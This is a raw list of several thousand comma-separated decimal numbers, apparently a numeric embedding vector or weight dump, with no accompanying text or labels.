-0.03958843648433685, -0.0075598908588290215, 0.01022893562912941, 0.002903488464653492, -0.0007520215585827827, 0.011801508255302906, -0.005258740857243538, 0.008627508766949177, 0.041377417743206024, 0.004068490583449602, 0.010510267689824104, 0.023227907717227936, -0.005716806743294001, 0.007502181455492973, 0.008317322470247746, 0.03347127139568329, 0.014347922056913376, 0.01312160398811102, -0.008894413709640503, -0.013085535727441311, 0.0048151020891964436, -0.015552599914371967, -0.011051290668547153, 0.0007930491119623184, 0.016187399625778198, -0.0050711859948933125, -0.008216331712901592, -0.03808799758553505, 0.030932072550058365, -0.01615854538977146, -0.004811495076864958, 0.003311058972030878, 0.01358327642083168, -0.0004941340885125101, -0.0178032536059618, -0.0010297466069459915, -0.0033507340122014284, 0.014773527160286903, 0.017009753733873367, -0.030614672228693962, -0.00977447722107172, -0.013157672248780727, 0.025391999632120132, 0.005705986171960831, 0.03904020041227341, -0.015379472635686398, 0.026142217218875885, -0.0028656169306486845, -0.005922395270317793, -0.01827935315668583, -0.015812290832400322, 0.013265877030789852, -0.0194191075861454, -0.016317244619131088, -0.016071980819106102, -0.005031511187553406, -0.004991836380213499, 0.0057636951096355915, -0.008778994902968407, 0.010142371989786625, 0.03404836356639862, 0.01592770777642727, 0.016374953091144562, -0.006142411381006241, -0.002315577119588852, -0.017471427097916603, -0.010200081393122673, -0.015725726261734962, 0.020053908228874207, -0.013020613230764866, -0.012703212909400463, -0.027570517733693123, -0.01950567215681076, -0.0007781710010021925, 0.005096433684229851, 0.02725311741232872, -0.03047039918601513, 0.012515658512711525, -0.007145106792449951, -0.004486881662160158, -0.024194534868001938, -0.006665399763733149, -0.01946238987147808, 0.005861079320311546, 0.0040179952047765255, -0.008490449748933315, -0.012356958352029324, -0.03736663609743118, 0.0003437748528085649, 0.09077639877796173, -0.0019530919380486012, -0.01972208172082901, -0.014081018045544624, 0.007660881616175175, 0.010164013132452965, -0.01447776798158884, -0.005132501944899559, 0.008937695063650608, 0.011224417947232723, 0.0045409840531647205, -0.02576710842549801, -0.019101709127426147, 0.02451193518936634, 0.028061045333743095, 0.021972736343741417, 0.007199208717793226, -0.003100060159340501, 0.029749035835266113, -0.014888945035636425, -0.011989063583314419, 0.009911536239087582, 0.015869999304413795, -0.002611336298286915, 0.009132463485002518, -0.012616649270057678, -0.0027898738626390696, -0.011989063583314419, -0.033759817481040955, -0.015062072314321995, -0.009875467978417873, -0.02425224520266056, -0.001122622168622911, -0.013309158384799957, 0.006355213467031717, 0.010149586014449596, 0.004670829512178898, -0.03292303532361984, 0.004670829512178898, -0.018755454570055008, -0.013705908320844173, 0.001260582939721644, 0.005572533700615168, 0.021280227228999138, -0.008562586270272732, -0.026575036346912384, 0.010257790796458721, 0.01954895444214344, -0.00017312726413365453, 0.005219065584242344, 0.008843918330967426, -0.03182656317949295, 0.010026954114437103, 0.03635672479867935, 0.0054895770736038685, -0.007430045399814844, 0.007740231696516275, 0.007303806487470865, -0.006301111076027155, -0.004075704608112574, -0.005403013434261084, 0.011462467722594738, 0.03081665374338627, 0.007538249716162682, 0.018221644684672356, 0.017529135569930077, -0.020933972671628, -0.026878008618950844, 0.022189144045114517, 0.01881316304206848, 0.010048595257103443, 0.017053036019206047, 0.0019260408589616418, -0.00582140451297164, 0.004259651992470026, 0.03122061677277088, 0.02302592620253563, 0.0136481998488307, -0.017096318304538727, -0.009103608317673206, 0.018438054248690605, 0.013684268109500408, -0.016923191025853157, 0.011505750007927418, -0.02172747254371643, 0.02803218923509121, -0.01592770777642727, -0.03485628962516785, 0.015725726261734962, -0.010957513004541397, -0.024742772802710533, -0.012025131843984127, 0.007862863130867481, -0.004082918167114258, 0.01264550443738699, -0.0025085420347750187, 0.009168531745672226, 0.022751808166503906, 0.007906145416200161, -0.008122554048895836, 0.0018187380628660321, 0.0028890613466501236, 0.00039539742283523083, -0.023631872609257698, -0.0009341659024357796, -0.004270472563803196, 0.0026401907671242952, 0.013366867788136005, -0.01698089949786663, -0.010474199429154396, 0.0015869999770075083, -0.006701468024402857, -0.01497550867497921, -0.03199968859553337, -0.015769008547067642, -0.016533654183149338, 0.017341582104563713, -0.009507572278380394, 0.00907475408166647, -0.012097267434000969, -0.04885074496269226, -0.018914153799414635, 0.033932942897081375, -0.007754658814519644, -0.006026993039995432, 0.019577808678150177, -0.026185499504208565, 0.0028728304896503687, 0.02772921696305275, 0.010856522247195244, 0.010438131168484688, -0.011512963101267815, 0.03534681722521782, -0.01797638088464737, 0.0055941748432815075, -0.01497550867497921, 0.011758226901292801, 0.03955958038568497, -0.0032335123978555202, 0.005601388402283192, 0.004807888530194759, 0.016129691153764725, 0.010690608993172646, 0.0035599293187260628, 0.002021621447056532, 0.005251527298241854, 0.020140472799539566, 0.009832185693085194, 0.014441699720919132, 0.002896274905651808, -0.03202854469418526, -0.027238689363002777, -0.007080183830112219, 0.018466908484697342, -0.010337140411138535, 0.0020558862015604973, 0.03912676125764847, -0.010524694807827473, 0.013662626966834068, -0.019101709127426147, -0.0037510907277464867, -0.015523744747042656, 0.027657080441713333, 0.010842095129191875, -0.0008647346403449774, 0.01598541811108589, 0.004595085978507996, -0.02995101734995842, -0.028147608041763306, -0.037510909140110016, 0.03182656317949295, -0.007956640794873238, -0.026978999376296997, 0.0034679556265473366, 0.022318990901112556, 0.012248754501342773, -0.0012759119272232056, 0.022535398602485657, 0.0038160134572535753, 0.011960208415985107, -0.006795245222747326, 0.034971706569194794, -0.00623618857935071, -0.00792057253420353, 0.030181853100657463, -0.009983672760426998, 0.0026600284036248922, -0.021669762209057808, -0.0356065072119236, 0.01654808036983013, 0.00855537224560976, 0.022795090451836586, -0.002930539660155773, -0.035202544182538986, 0.0075093950144946575, 0.0076248133555054665, 0.008194690570235252, -0.017009753733873367, -0.028537144884467125, -0.003605014644563198, -0.001949485158547759, 0.0039061838760972023, 0.030008725821971893, -0.000973840884398669, 0.010820453986525536, -0.024266671389341354, -0.027801353484392166, 0.02015489898622036, 0.0008016153005883098, 0.004274079576134682, -0.013828540220856667, -0.0036320658400654793, 0.01294847670942545, -0.0030766157433390617, 0.017298299819231033, -0.017125172540545464, -0.0025049352552741766, -0.000270962220383808, 0.022304562851786613, -0.013265877030789852, -0.022492118179798126, 0.022780662402510643, -0.0036266555543988943, 0.005561713594943285, -0.0011469681048765779, 0.018726598471403122, 0.00953642651438713, -0.012039558961987495, -0.02345874533057213, 0.021496634930372238, -0.010964727029204369, 0.0038484749384224415, 0.0015518334694206715, 0.011455253697931767, 0.018438054248690605, -0.0020919544622302055, 0.009824972599744797, -0.04717718064785004, 0.03165343403816223, -0.013590490445494652, 0.01646151766180992, -0.02438209019601345, -0.023920416831970215, -0.0009093690314330161, 0.030239563435316086, -0.0002495467197149992, -0.0020811341237276793, 0.020789699628949165, -0.0198519267141819, 0.006881808862090111, -0.005406620446592569, -0.013879035599529743, 0.009521999396383762, 0.0023750897962599993, -0.006221760995686054, 0.02233341708779335, 0.011383118107914925, 0.014946654438972473, 0.005738447420299053, -0.01928926259279251, -0.008613081648945808, 0.0010847505182027817, -0.009348872117698193, -0.010654540732502937, 0.0013489499688148499, -0.0015193721046671271, -0.035289108753204346, 0.017211735248565674, -0.001221809652633965, -0.0020667067728936672, 0.0031866237986832857, 0.01680777221918106, -0.013071108609437943, -0.005287595093250275, -0.0028764375019818544, -0.020082762464880943, 0.030239563435316086, -0.010257790796458721, -0.007473327219486237, 0.001148771494626999, 0.0059440359473228455, 0.0496298149228096, -0.002420174889266491, -0.0073687294498085976, -0.024930326268076897, -0.012631076388061047, -0.011036863550543785, -0.03073008917272091, -0.012140549719333649, 0.009716767817735672, 0.003374178195372224, -0.0010153192561119795, -0.0006370542105287313, -0.011476894840598106, 0.02350202575325966, -0.00682409992441535, -0.010531908832490444, 0.03090321645140648, 0.0302107073366642, 0.022218000143766403, 0.0028818475548177958, 0.025997944176197052, 0.02390599064528942, -0.018481336534023285, -0.024800481274724007, -0.015696872025728226, -0.001650119316764176, 0.00010944438690785319, 0.011570672504603863, -0.028003334999084473, -0.013915103860199451, -0.001793490257114172, -0.048475634306669235, -0.0037619112990796566, 0.010986368171870708, -0.007466113194823265, 0.006073881406337023, -0.004097345285117626, 0.009594135917723179, 0.0035328783560544252, 0.004793461412191391, 0.0021063818130642176, -0.026575036346912384, 0.0032858112826943398, 0.0026726522482931614, -0.013244235888123512, -0.017096318304538727, 0.013518353924155235, -0.010344354435801506, -0.00003378574183443561, 0.02790234424173832, 0.028926681727170944, 0.010466986335814, -0.001320997136645019, 0.007318234071135521, 0.0022777055855840445, 0.011837576515972614, 0.009572494775056839, -0.007884504273533821, 0.0032659736461937428, -0.017615700140595436, 0.021612053737044334, -0.00463476125150919, 0.0032858112826943398, 0.02181403525173664, -0.010164013132452965, -0.008872772566974163, 0.0026834725867956877, -0.009839399717748165, -0.005734840873628855, -0.0011659039882943034, -0.0021713045425713062, -0.008014349266886711, -0.009962031617760658, 0.011044076643884182, 0.03326928988099098, -0.013020613230764866, 0.02367515303194523, 0.01915941759943962, -0.01868331804871559, -0.02576710842549801, -0.01937582716345787, 0.028984390199184418, -0.01954895444214344, 0.01325866300612688, -0.016562508419156075, 0.010647326707839966, 0.03165343403816223, -0.020053908228874207, 0.028897825628519058, -0.005958463530987501, -0.012335318140685558, -0.01242909487336874, 0.0013859198661521077, 0.006503093056380749, 0.0054246545769274235, 0.031538017094135284, -0.012825844809412956, -0.0302107073366642, -0.0021640907507389784, -0.007256918121129274, -0.0036843647249042988, -0.0037366636097431183, -0.008851131424307823, -0.004649188369512558, -0.005720413289964199, -0.005002656485885382, 0.004793461412191391, -0.040511779487133026, -0.03459659963846207, 0.00870685838162899, -0.00740119069814682, 0.032143961638212204, 0.030008725821971893, -0.001119015272706747, 0.02390599064528942, 0.005262347403913736, -0.01275370828807354, -0.012890767306089401, -0.016389381140470505, 0.016692353412508965, 0.018091799691319466, 0.04276243597269058, 0.011895285919308662, -0.005229886155575514, 0.018611181527376175, 0.01853904500603676, -0.04276243597269058, 0.03817456215620041, 0.017788827419281006, 0.038463108241558075, -0.022304562851786613, -0.017038607969880104, -0.02129465341567993, -0.00024098053108900785, -0.016432663425803185, -0.005107254255563021, 0.03875165432691574, -0.005435474682599306, 0.007022474892437458, -0.010567977093160152, -0.01836591772735119, -0.02207372710108757, -0.020126044750213623, -0.007480540778487921, -0.004335395526140928, -0.006517520174384117, -0.007819581776857376, -0.02656060829758644, -0.0012479590950533748, -0.014816808514297009, 0.005990924779325724, 0.009421008639037609, -0.02084740810096264, -0.003280400997027755, 0.01428299956023693, 0.0006830411730334163, 0.007191995158791542, -0.01598541811108589, 0.008418313227593899, 0.01190971303731203, -0.006510306615382433, 0.006344392895698547, -0.007819581776857376, -0.010091876611113548, -0.015047645196318626, 0.009139676578342915, 0.00859865453094244, -0.006189299747347832, -0.008973763324320316, 0.017572417855262756, 0.003280400997027755, 0.013518353924155235, 0.021410072222352028, -0.005017084069550037, -0.010668967850506306, 0.013013399206101894, 0.021366789937019348, -0.0011370494030416012, -0.017514709383249283, 0.0036645270884037018, -0.010654540732502937, 0.002506738528609276, 0.001416577841155231, 0.019015144556760788, -0.004905272740870714, 0.014679749496281147, -0.005965677089989185, 0.019101709127426147, -0.0037402703892439604, -0.008259613066911697, 0.003293024841696024, -0.004418352153152227, -0.006066667847335339, 0.014874517917633057, 0.005255133844912052, -0.0012786169536411762, -0.012746495194733143, 0.0029684111941605806, 0.007711376994848251, 0.018438054248690605, 0.020818553864955902, -0.006081095430999994, 0.010510267689824104, -0.0030820260290056467, 0.01562473550438881, 0.00740119069814682, 0.013359653763473034, -0.0007213635835796595, 0.014268572442233562, -0.0033615543507039547, -0.0003288967127446085, -0.016778917983174324, 0.0082523999735713, -0.005608601961284876, 0.0067519634030759335, 0.008656363002955914, -0.001122622168622911, 0.006081095430999994, 0.020039482042193413, -0.017485853284597397, -0.0018232464790344238, -0.008663577027618885, -0.023386608809232712, 0.006907056551426649, -0.022318990901112556, 0.003383195260539651, 0.007430045399814844, 0.010380422696471214, -0.004108165856450796, -0.008245185948908329, -0.003581570228561759, -0.006726715713739395, 0.0029467702843248844, 0.023963699117302895, 0.012861913070082664, 0.016778917983174324, 0.02024146355688572, -0.00529120210558176, 0.0006934107514098287, 0.024497509002685547, 0.00260592601262033, -0.00023669743677601218, 0.0006970175891183317, 0.0041983360424637794, -0.002733968198299408, 0.011859217658638954, 0.006697861012071371, -0.018596753478050232, -0.0016429056413471699, -0.00471411133185029, -0.005258740857243538, 0.0009192877332679927, -0.016735635697841644, 0.00623618857935071, 0.006106343120336533, 0.010856522247195244, -0.011332622729241848, -0.002613139571622014, 0.005229886155575514, 0.004245224874466658, 0.0030964533798396587, -0.0017853749450296164, 0.028277453035116196, -0.0017195504624396563, -0.009132463485002518, -0.005237099714577198, 0.006723108701407909, -0.012133335694670677, -0.015812290832400322, -0.016620216891169548, -0.006723108701407909, -0.04775427281856537, -0.014499408192932606, 0.007008047308772802, -0.00008425301348324865, 0.003121701069176197, -0.0020558862015604973, -0.011981849558651447, 0.0056879520416259766, 0.018308209255337715, 0.02203044481575489, 0.012421881780028343, 0.0018070158548653126, 0.019577808678150177, 0.0005396701744757593, 0.0039422521367669106, -0.004349822644144297, 0.01836591772735119, -0.002039655577391386, 0.005651883780956268, -0.007617599796503782, 0.004313754383474588, 0.0016600380185991526, -0.01646151766180992, -0.005255133844912052, 0.005161356646567583, -0.01309996284544468, 0.02572382614016533, -0.0023804998490959406, 0.003588784020394087, 0.00787729024887085, -0.016086408868432045, -0.0035382884088903666, 0.005965677089989185, -0.016519226133823395, -0.002611336298286915, 0.020053908228874207, 0.0012362368870526552, -0.014254145324230194, 0.006355213467031717, 0.006081095430999994, -0.011823149397969246, -0.008014349266886711, -0.015999844297766685, -0.007011654321104288, -0.0034517247695475817, -0.003787158988416195, -0.006304718088358641, 0.026935717090964317, -0.025233298540115356, 0.008281254209578037, 0.010863736271858215, 0.012825844809412956, -0.016432663425803185, -0.007567104417830706, 0.06826984882354736, -0.023054780438542366, -0.02977789007127285, -0.01959223486483097, -0.0030441544950008392, 0.0005117172840982676, 0.0018322635442018509, -0.012292035855352879, -0.011945781297981739, 0.021265799179673195, 0.00332548632286489, 0.007660881616175175, -0.02272295393049717, -0.004100952297449112, 0.017774399369955063, -0.012782563455402851, 0.0018331652972847223, 0.00679163821041584, 0.0076248133555054665, 0.00988268107175827, 0.0034859897568821907, 0.009514786303043365, 0.007210029289126396, -0.008526518009603024, -0.006427349988371134, -0.00486559746786952, -0.017298299819231033, -0.005655490793287754, -0.024584071710705757, 0.004771820269525051, -0.018741026520729065, -0.013691481202840805, -0.012414667755365372, -0.008396672084927559, -0.01763012632727623, -0.019217126071453094, -0.012861913070082664, 0.0016672516940161586, -0.010719463229179382, -0.02089069038629532, 0.010762745514512062, 0.00940658152103424, -0.003823227249085903, 0.0015202738577499986, 0.004591479431837797, 0.0001634339423617348, 0.0028439760208129883, 0.002147860126569867, -0.022751808166503906, -0.013265877030789852, 0.041550543159246445, -0.0024760805536061525, -0.019390253350138664, -0.017615700140595436, 0.005662704352289438, 0.01140475831925869, -0.0057095931842923164, 0.007891718298196793, 0.005612208973616362, -0.002144253347069025, -0.00807205867022276, 0.006795245222747326, -0.00386290205642581, 0.02860928140580654, -0.02602679841220379, -0.018221644684672356, -0.000584304507356137, -0.001940468093380332, 0.015696872025728226, -0.0037546975072473288, 0.010301072150468826, -0.00015103550686035305, -0.025175590068101883, 0.008959336206316948, -0.009002617560327053, -0.0036266555543988943, 0.0003728548181243241, -0.009810545481741428, 0.015004362910985947, -0.0044363862834870815, -0.01758684404194355, -0.010539121925830841, 0.006055847741663456, -0.007711376994848251, 0.014427272602915764, -0.0037402703892439604, 0.016778917983174324, 0.0033777852077037096, -0.007357908878475428, -0.043166399002075195, 0.018784308806061745, 0.008158622309565544, 0.00429932726547122, 0.0007632928900420666, 0.003677150933071971, 0.006589656695723534, 0.005467936396598816, -0.004768213257193565, -0.012659931555390358, -0.007422831375151873, -0.00038006846443749964, -0.003284007776528597, -0.002721344120800495, -0.018163936212658882, 0.020573290064930916, -0.02542085386812687, -0.0012091858079656959, -0.015220772475004196, -0.015869999304413795, -0.0334424152970314, -0.01012073177844286, 0.01443448569625616, 0.022751808166503906, 0.020962826907634735, -0.00990432221442461, 0.011484108865261078, 0.009363299235701561, -0.003504023654386401, -0.01763012632727623, -0.00656080199405551, 0.010005312971770763, -0.009651845321059227, -0.02276623621582985, -0.016129691153764725, 0.0072244564071297646, 0.02798890881240368, 0.01967879943549633, 0.00638767471536994, -0.00002467007107043173, -0.003678954439237714, -0.0325767807662487, -0.020962826907634735, 0.0054787565022706985, -0.005009870510548353, 0.024353235960006714, 0.0029575908556580544, -0.01993848942220211, 0.018885299563407898, 0.006831313483417034, -0.006412922404706478, 0.011989063583314419, 0.00403602933511138, -0.00544268824160099, 0.0020991680212318897, -0.00774744525551796, 0.0067808181047439575, -0.004292113706469536, 0.0022885261569172144, -0.005980104207992554, -0.015004362910985947, 0.010769958607852459, -0.0062470086850225925, -0.005190211348235607, 0.019087281078100204, -0.011238845065236092, -0.0038701158482581377, -0.0262143537402153, 0.00855537224560976, -0.009081968106329441, -0.0030784192495048046, 0.002822335110977292, -0.034712016582489014, -0.010041381232440472, -0.01312160398811102, 0.010142371989786625, 0.010921444743871689, 0.012198259122669697, -0.01210448145866394, 0.0006708681466989219, 0.004097345285117626, 0.008086485788226128, -0.02224685437977314, 0.0038665090687572956, 0.009666272439062595, 0.008692431263625622, 0.008108126930892467, -0.02119366265833378, 0.0008723991340957582, -0.005507611203938723, 0.010409276932477951, -0.011289340443909168, 0.020530007779598236, 0.00780515419319272, 0.0005256937583908439, 0.012068413197994232, 0.014694176614284515, 0.0021713045425713062, 0.010899804532527924, 0.003404836170375347, 0.004378677345812321, -0.012876340188086033, 0.01775997132062912, 0.007354301866143942, -0.005493184085935354, -0.006019779480993748, -0.026055654510855675, 0.0157545804977417, -0.004533770494163036, 0.008786208927631378, 0.029359498992562294, 0.009219027124345303, 0.0008430937305092812, 0.0008047712617553771, -0.01810622587800026, 0.015783436596393585, -0.003769124858081341, -0.02494475431740284, -0.0016582346288487315, -0.0024544396437704563, -0.0182360727339983, 0.002541003283113241, -0.026531754061579704, 0.02820531651377678, 0.002813318045809865, -0.006701468024402857, 0.004317361395806074, 0.024887043982744217, -0.004504915792495012, 0.021107099950313568, -0.023891562595963478, -0.00603059958666563, -0.009341659024357796, 0.001945878379046917, 0.021482208743691444, 0.008483235724270344, 0.0012894374085590243, -0.011188349686563015, -0.011541817337274551, -0.016216253861784935, -0.011916927061975002, -0.005727626848965883, 0.0241656806319952, -0.005633849650621414, 0.023646298795938492, -0.012934049591422081, -0.015249626711010933, 0.012984544970095158, 0.006604083813726902, 0.007538249716162682, -0.024887043982744217, -0.005705986171960831, -0.012068413197994232, 0.013402936048805714, -0.022145863622426987, -0.005247920285910368, 0.017341582104563713, -0.005936822388321161, 0.013943959027528763, 0.028652561828494072, 0.005276774987578392, -0.024151254445314407, 0.0012903391616418958, -0.004631154239177704, -0.009781690314412117, 0.022737380117177963, -0.018611181527376175, 0.0027934806421399117, -0.030326126143336296, 0.0004779034061357379, -0.017442572861909866, 0.0038484749384224415, -0.01007744949311018, -0.01750028133392334, -0.0017574221128597856, -0.014153153635561466, -0.014463340863585472, 0.00905311293900013, 0.007383156567811966, 0.013568849302828312, 0.013172099366784096, -0.0025860886089503765, 0.0037258430384099483, -0.03526025265455246, 0.0005193817778490484, 0.030787799507379532, 0.006265042815357447, 0.016793344169855118, -0.004699683748185635, 0.013893462717533112, 0.01277534943073988, 0.00794221367686987, 0.0010865539079532027, -0.007116252090781927, -0.006452597677707672, -0.0022921329364180565, 0.05594896152615547, -0.00403602933511138, 0.024699490517377853, 0.0330095998942852, 0.004807888530194759, -0.010221722535789013, -0.010510267689824104, -0.013402936048805714, -0.011830363422632217, -0.0073506953194737434, -0.00953642651438713, -0.010409276932477951, 0.022434407845139503, -0.013042254373431206, 0.01693761721253395, -0.00723888399079442, -0.010892590507864952, 0.007523822598159313, 0.018755454570055008, -0.0032623668666929007, 0.010026954114437103, -0.008800636045634747, -0.015639163553714752, 0.007581531535834074, -0.006643759086728096, -0.009413795545697212, 0.009168531745672226, -0.020602144300937653, 0.019563380628824234, 0.017211735248565674, 0.005990924779325724, 0.013042254373431206, 0.01827935315668583, 0.005832224618643522, -0.004515736363828182, -0.010647326707839966, 0.015090926550328732, -0.008007136173546314, -0.010849309153854847, 0.004151447676122189, 0.002012604381889105, 0.02843615412712097, 0.006874595303088427, -0.014636468142271042, 0.006744749844074249, -0.007437258958816528, 0.007430045399814844, -0.012263181619346142, 0.004483274649828672, -0.014917799271643162, -0.01571130007505417, -0.006059454288333654, 0.009543640539050102, 0.0013624755665659904, -0.019967345520853996, 0.004061277024447918, 0.019491244107484818, -0.0037619112990796566, 0.020832981914281845, -0.007834008894860744, -0.008432740345597267, 0.007058543153107166, -0.0030838295351713896, -0.010156800039112568, 0.013388508930802345, -0.020169327035546303, -0.015437181107699871, 0.018842017278075218, -0.004097345285117626, -0.00955806765705347, -0.004944947548210621, 0.02355973608791828, 0.03133603557944298, 0.029806744307279587, -0.007812367752194405, 0.005164963658899069, 0.008439954370260239, 0.008201904594898224, -0.0015148635720834136, -0.0007592351757921278, -0.024973608553409576, 0.0072352769784629345, -0.007834008894860744, 0.00019082322251051664, 0.004941340535879135, -0.019433535635471344, 0.014059376902878284, 0.010149586014449596, -0.007163140457123518, 0.010719463229179382, -0.005139715503901243, -0.03231709077954292, -0.009572494775056839, -0.014665322378277779, -0.010380422696471214, -0.01592770777642727, 0.007267738226801157, 0.003999961074441671, -0.002248851116746664, 0.0009512982796877623, -0.010322713293135166, 0.02651732601225376, 0.0018755453638732433, 0.013612131588160992, -0.00035617328830994666, 0.005107254255563021, 0.005363338626921177, 0.001504944870248437, -0.007581531535834074, -0.012414667755365372, -0.0003586529637686908, 0.009038685820996761, -0.003971106838434935, 0.019447963684797287, 0.011505750007927418, -0.013893462717533112, -0.001466171583160758, -0.0023137738462537527, -0.014117086306214333, 0.017557989805936813, 0.001614952809177339, -0.02420896291732788, 0.023978127166628838, -0.004764606710523367, 0.013814113102853298, -0.006488665472716093, 0.010466986335814, 0.013511140830814838, -0.004732145462185144, 0.006142411381006241, 0.012227113358676434, 0.0005559008568525314, 0.004641974810510874, -0.006719502154737711, 0.005673524923622608, 0.0009377726819366217, 0.004111772403120995, 0.005886327009648085, 0.006611297372728586, -0.0016311834333464503, -0.0068457406014204025, 0.008338963612914085, -0.004209156613796949, -0.0011000795057043433, 0.018957436084747314, 0.0023696795105934143, 0.013374081812798977, 0.00521185202524066, 0.0006591459969058633, -0.0008845721022225916, -0.017904244363307953, -0.006005351897329092, -0.01885644532740116, -0.011520177125930786, 0.0030928466003388166, -0.005092827137559652, -0.00260592601262033, -0.005969284102320671, 0.033846382051706314, -0.01676448993384838, 0.012854699976742268, -0.008497663773596287, -0.011130640283226967, -0.014001667499542236, 0.002515755593776703, 0.024266671389341354, 0.021741898730397224, 0.009233454242348671, 0.014499408192932606, -0.015999844297766685, -0.004003568086773157, 0.0029575908556580544, -0.006939517799764872, 0.0006307422881945968, -0.01164280902594328, -0.02755608968436718, -0.022016016766428947, -0.044695690274238586, -0.00289988168515265, 0.0008038695668801665, 0.01071224920451641, -0.001931451028212905, -0.005179390776902437, 0.016043126583099365, -0.0182360727339983, 0.0027483953163027763, -0.010315499268472195, 0.03113405406475067, 0.0013787061907351017, -0.022665245458483696, -0.004660008940845728, 0.01584114506840706, -0.0022740988060832024, -0.005976497661322355, -0.0025860886089503765, 0.009219027124345303, -0.012349745258688927, 0.01771669089794159, -0.006311931647360325, -0.0036464929580688477, 0.003605014644563198, 0.01077717263251543, -0.008396672084927559, -0.005507611203938723, -0.019491244107484818, 0.012349745258688927, -0.007790727075189352, 0.0097095537930727, -0.0018034090753644705, 0.007033294998109341, -0.004414745140820742, 0.008786208927631378, 0.016490371897816658, 0.019188271835446358, -0.011859217658638954, -0.026300916448235512, 0.016172971576452255, -0.03003758005797863, -0.013691481202840805, -0.0016185595886781812, 0.0015698675997555256, 0.01548046339303255, 0.016043126583099365, 0.00665097264572978, 0.012436308898031712, 0.00737954955548048, 0.0026888828724622726, -0.019823072478175163, -0.004219977185130119, -0.022102581337094307, -0.005536465905606747, 0.020731989294290543, -0.01527848094701767, 0.03159572556614876, -0.00606306130066514, -0.0014264965429902077, -0.00696476548910141, 0.021958308294415474, 0.006521127186715603, -0.008656363002955914, -0.002236227272078395, -0.017298299819231033, 0.03895363584160805, 0.012890767306089401, -0.006907056551426649, -0.003931431565433741, 0.008526518009603024, -0.03122061677277088, 0.02921522594988346, 0.004688863642513752, 0.005641063675284386, -0.005882720462977886, -0.008930481970310211, 0.0014237914001569152, -0.005561713594943285, 0.013987240381538868, -0.0035725533962249756, 0.0007371434476226568, 0.015235199593007565, -0.019058426842093468, 0.03722236305475235, 0.008259613066911697, -0.004797067958861589, 0.0032605635933578014, 0.0007218144601210952, -0.008735713548958302, -0.028320735320448875, 0.05167848989367485, -0.01719730906188488, -0.008764567784965038, 0.017182881012558937, 0.01663464494049549, 0.011433613486588001, -0.02772921696305275, -0.004068490583449602, 0.01090701762586832, 0.011224417947232723, -0.002651011338457465, -0.000009911705092235934, -0.015134208835661411, -0.0032713839318603277, 0.002126219216734171, 0.0000251631918217754, -0.006524733733385801, -0.00443999283015728, -0.0001316488633165136, 0.0003361103590577841, 0.011960208415985107, 0.01493222638964653, 0.01879873499274254, -0.0013624755665659904, -0.005446295253932476, 0.001857511349953711, 0.01894300803542137, -0.018914153799414635, -0.022189144045114517, -0.01615854538977146, 0.0028692237101495266, 0.005136108957231045, -0.007494967896491289, 0.001859314739704132, -0.010466986335814, -0.0014805988175794482, -0.008778994902968407, -0.020010625943541527, -0.01227760873734951, -0.006892629433423281, 0.014016094617545605, -0.01610083505511284, -0.004209156613796949, 0.0014048556331545115, -0.009146890603005886, 0.002533789724111557, -0.02390599064528942, 0.0009125249926000834, 0.002133432775735855, -0.002041459083557129, 0.007375943008810282, -0.001655529486015439, 0.0022921329364180565, 0.009796117432415485, 0.005540072452276945, 0.01894300803542137, -0.002925129374489188, -0.014160367660224438, 0.01206119917333126, 0.01549489051103592, 0.01179429516196251, 0.020313600078225136, -0.018077371641993523, -0.01447776798158884, 0.011556245386600494, -0.0026834725867956877, -0.02116480842232704, -0.007999922148883343, -0.028306307271122932, 0.0025933021679520607, 0.0038160134572535753, 0.008872772566974163, -0.021438926458358765, -0.011635595001280308, 0.01090701762586832, 0.008367817848920822, -0.017384862527251244, -0.01767340861260891, 0.020097190514206886, 0.000685295439325273, 0.01549489051103592, 0.012897981330752373, -0.007581531535834074, 0.005875506438314915, 0.004256045445799828, 0.0032190850470215082, 0.00960134994238615, 0.007098217960447073, -0.0025049352552741766, 0.029099809005856514, 0.015538171865046024, 0.036933816969394684, -0.02298264391720295, 0.006910663563758135, 0.005237099714577198, -0.011844790540635586, 0.023040354251861572, 0.009024258702993393, 0.03055696189403534, 0.02904209867119789, 0.006124377250671387, 0.020400162786245346, 0.024656208232045174, -0.0032281021121889353, -0.005439081694930792, -0.019404681399464607, -0.005922395270317793, -0.011397545225918293, 0.018784308806061745, -0.020342454314231873, 0.0182360727339983, -0.0008633820689283311, 0.023170199245214462, 0.007963853888213634, 0.0028980784118175507, -0.008237972855567932, 0.019967345520853996, -0.02015489898622036, -0.0038160134572535753, 0.006935911253094673, -0.017572417855262756, -0.0025536271277815104, 0.009861040860414505, 0.00875014066696167, 0.003215478267520666, 0.008237972855567932, 0.0016672516940161586, -0.010265003889799118, 0.002137039788067341, -0.02407911792397499, 0.002039655577391386, 0.00048556787078268826, 0.009002617560327053, 0.03912676125764847, 0.003797979326918721, -0.02938835322856903, 0.013640985824167728, 0.01460761297494173, -0.010560763068497181, -0.008995404466986656, -0.00654998142272234, -0.005525645334273577, -0.009651845321059227, 0.007422831375151873, 0.0022813123650848866, -0.018957436084747314, 0.010070236399769783, 0.009788904339075089, 0.01614411734044552, -0.010611258447170258, -0.003583373734727502, 0.002441815799102187, -0.006347999908030033, 0.0014138726983219385, 0.00028584033134393394, -0.012955690734088421, -0.011476894840598106, -0.01597099006175995, 0.008259613066911697, 0.006820492912083864, 0.009889895096421242, -0.00021449296036735177, -0.001313783461228013, 0.00772580411285162, 0.015177490189671516, -0.0241656806319952, 0.010192867368459702, 0.006164052058011293, -0.0019116136245429516, -0.01993848942220211, -0.009110822342336178, -0.0019783396273851395, 0.02367515303194523, 0.022838372737169266, -0.017817681655287743, -0.007834008894860744, -0.000900351966265589, 0.013886249624192715, -0.005085613578557968, 0.018582327291369438, 0.01264550443738699, -0.010921444743871689, 0.0018809556495398283, 0.004566231742501259, -0.00046257441863417625, -0.012111695483326912, -0.013359653763473034, -0.018928581848740578, 0.009161317721009254, 0.023530881851911545, -0.008872772566974163, 0.023804999887943268, -0.03635672479867935, -0.011880858801305294, 0.012053986079990864, 0.0018232464790344238, 0.0039422521367669106, -0.01206119917333126, 0.010308286175131798, -0.00892326794564724, 0.0006406610482372344, -0.011087358929216862, 0.003329093102365732, 0.005190211348235607, 0.011390331201255322, 0.018553471192717552, 0.03543338179588318, -0.023790571838617325, 0.012515658512711525, 0.00740119069814682, 0.004248831886798143, 0.03791487216949463, 0.023603016510605812, 0.015826717019081116, 0.005298415664583445, 0.0019080067286267877, 0.006773604545742273, 0.007516609039157629, -0.0026708487421274185, 0.0030928466003388166, -0.0022001590114086866, -0.010127944871783257, 0.01059683132916689, 0.001212792587466538, -0.015350617468357086, 0.02464178018271923, 0.0020739203318953514, -0.008375031873583794, 